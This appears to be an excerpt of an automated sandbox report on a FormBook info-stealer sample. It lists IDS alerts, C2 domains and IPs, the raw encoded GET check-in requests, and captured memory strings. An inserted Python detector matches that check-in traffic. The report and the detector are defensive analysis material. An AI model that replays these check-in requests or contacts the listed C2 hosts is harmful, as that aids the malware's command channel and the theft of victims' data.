Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbg source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Xml.pdb source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: powrprof.pdbT source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb? source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\Desktop\PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wlanext.pdbGCTL source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Code function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Code function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop esi

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor | URLs: www.hnchotels.com/mb7q/
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe | DNS query: www.belatopapparel.xyz
          Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: myliverpoolnews.cf | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1 | Host: www.pradnyanamaya.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?yN60IZO0=LCdox3MSFrqgB2UnRRxcW6IJzj2SaKpVJDnxyOZjgJWO5AYJJIYTqL+jJlLhwAlefZ0q&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.hepimizdostuz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1 | Host: www.hnchotels.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.bookitstaugustine.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=wg6/7HKVKbWyxm3ocgI2qQ4ybtWVQQxygyNCKw3F9tUQ2TQ7UscRDkS2j2ufAGdI66vr HTTP/1.1 | Host: www.beyju.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.szmsbk.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.szmsbk.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr HTTP/1.1 | Host: www.accessibleageing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.theskineditco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?yN60IZO0=icy9hz7ZIr7yHvDFY6JKJS3opDpdp14zNZwv94Uz6fKXYU2e142cjQElnIAagsV1qBmU&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.thelandcle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ HTTP/1.1 | Host: www.tuyensinhhaiphong.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.merkuryindustries.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1 | Host: www.belatopapparel.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.helpmewithmyenergy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp HTTP/1.1 | Host: www.softballlyfe.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 172.67.150.212
          Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLC (US)
          Source: Joe Sandbox View | ASN Name: PEGTECHINC (US)
          Source: Joe Sandbox View | ASN Name: VNPT-AS-VN VNPTCorp (VN)
          Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: unknown | HTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.4:49727 version: TLS 1.0
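Added example, not part of the Joe Sandbox report and not FormBook code: a small Python detector that approximates what the ET rules 2031412/2031449/2031453 above key on when they fire. Every check-in in the traffic list has the same shape: a GET to a short single-segment path (/mb7q/), exactly two query parameters (one short token that stays fixed across every host, 1bhta6=SXxhAn0Xl, and one long base64-like blob), no User-Agent header, and Connection: close. The sample requests are transcribed from the report's "HTTP traffic detected" entries; the path-length and blob-length thresholds, the regular expressions and the function names are my assumptions. Grouping by (path, token) rather than by host is the useful pivot here, because the configuration extractor names only www.hnchotels.com/mb7q/ while the identical path and token are sent to every other host in the list.

```python
import re
from urllib.parse import urlsplit

# Constructed sample traffic: the news page the dropper fetched plus three of
# the /mb7q/ check-ins, rebuilt as raw HTTP/1.1 requests from the report's
# "HTTP traffic detected" entries. Only the news request carries a User-Agent.
SAMPLE_REQUESTS = [
    "GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-"
    "BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41\r\n"
    "Host: myliverpoolnews.cf\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/"
    "ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1\r\n"
    "Host: www.hnchotels.com\r\nConnection: close\r\n\r\n",
    "GET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS"
    "&1bhta6=SXxhAn0Xl HTTP/1.1\r\n"
    "Host: www.bookitstaugustine.com\r\nConnection: close\r\n\r\n",
    "GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/"
    "JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1\r\n"
    "Host: www.belatopapparel.xyz\r\nConnection: close\r\n\r\n",
]

# The thresholds below are my assumptions for this example, not values taken
# from the report or from the ET rules themselves.
CHECKIN_PATH = re.compile(r"^/[a-z0-9]{2,8}/$")   # short one-segment directory like /mb7q/
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{6,12}$")   # fixed per-bot identifier value
LONG_BLOB = re.compile(r"^[A-Za-z0-9+/=]{40,}$")   # encoded check-in payload value


def parse_request(raw):
    """Split a raw HTTP request into (method, target, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def split_query(query):
    """Parse key=value pairs without '+' or '%' decoding so base64-like values survive."""
    pairs = [p.partition("=") for p in query.split("&") if p]
    return {key: value for key, _, value in pairs}


def is_formbook_checkin(raw):
    """True when a request matches the FormBook GET check-in shape seen in the report."""
    method, target, headers = parse_request(raw)
    if method != "GET":
        return False
    parts = urlsplit(target)
    if not CHECKIN_PATH.match(parts.path):
        return False
    params = split_query(parts.query)
    if len(params) != 2:
        return False
    short, long_ = sorted(params.values(), key=len)
    if not (SHORT_TOKEN.match(short) and LONG_BLOB.match(long_)):
        return False
    # The injected explorer.exe sends no User-Agent and closes after each request.
    return "user-agent" not in headers and headers.get("connection", "").lower() == "close"


def checkin_summary(requests):
    """Group flagged check-ins by (path, bot token) and list the hosts contacted."""
    groups = {}
    for raw in requests:
        if not is_formbook_checkin(raw):
            continue
        _, target, headers = parse_request(raw)
        parts = urlsplit(target)
        token = min(split_query(parts.query).values(), key=len)
        groups.setdefault((parts.path, token), []).append(headers["host"])
    return groups


if __name__ == "__main__":
    for (path, token), hosts in checkin_summary(SAMPLE_REQUESTS).items():
        print(f"{path} token={token}: {', '.join(hosts)}")
```

The query parsing deliberately avoids urllib's parse_qsl, which would turn the '+' inside the blobs into spaces and break the base64-style match; the same care is needed in any log pipeline that normalises URLs before a rule sees them.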
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp | String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp | String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp | String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp | String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp | String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian 